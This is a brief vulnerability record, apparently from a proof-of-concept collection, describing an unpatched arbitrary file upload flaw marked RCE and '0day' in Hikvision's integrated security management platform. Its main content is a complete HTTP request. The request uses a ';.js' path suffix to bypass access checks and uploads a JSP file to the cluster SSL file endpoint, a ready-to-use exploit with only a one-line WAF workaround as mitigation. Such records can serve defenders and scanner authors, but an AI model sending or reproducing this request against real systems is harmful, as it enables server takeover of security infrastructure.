vendor = "海康威视"
name = "海康威视综合安防管理平台 clusters 接口任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/clusterMgr/clusters/ssl/file"
detail = "POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=--------------------------984514492333278399715408 ----------------------------984514492333278399715408 Content-Disposition: form-data; name=\"file\"; filename=\"xfufhdix.jsp\" Content-Type: image/png <%=\"nbklvuxv\"%> ----------------------------984514492333278399715408 Content-Disposition: form-data; name=\"proxyAddress\" 8.8.8.8 ----------------------------984514492333278399715408--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "0day"
